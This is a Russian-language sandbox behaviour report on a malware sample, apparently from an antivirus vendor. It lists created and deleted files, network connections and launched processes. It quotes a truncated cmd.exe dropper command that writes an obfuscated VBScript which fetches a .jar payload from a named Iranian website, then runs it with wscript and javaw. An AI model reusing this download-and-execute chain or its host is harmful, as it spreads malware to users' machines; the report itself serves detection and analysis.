Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @eCHo X7i= "http://www.ediet.ir/wp-admin/user/New Order-P.O_2410.jar">>A3i.VBS &@eCHo K6t = U1s("jpnjoMi`q")>>A3i.VBS &@eCHo Set U0h = CreateObject(U1s("lrwlkQMwlkgsso"))>>A3...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\a3i.vbs
- %TEMP%\kqokp.jar
Удаляет следующие файлы
- %TEMP%\a3i.vbs
Сетевая активность
Подключается к
- 'ed##t.ir':80
TCP
Запросы HTTP GET
- http://www.ed##t.ir/wp-admin/user/New%20Order-P.O_2410.jar
UDP
- DNS ASK ed##t.ir
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\A3i.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @eCHo X7i= "http://www.ediet.ir/wp-admin/user/New Order-P.O_2410.jar">>A3i.VBS &@eCHo K6t = U1s("jpnjoMi`q")>>A3i.VBS &@eCHo Set U0h = CreateObject(U1s("lrwlkQMwlkgsso"))>>A3...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' 13
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%TEMP%\KQOKP.JAR"
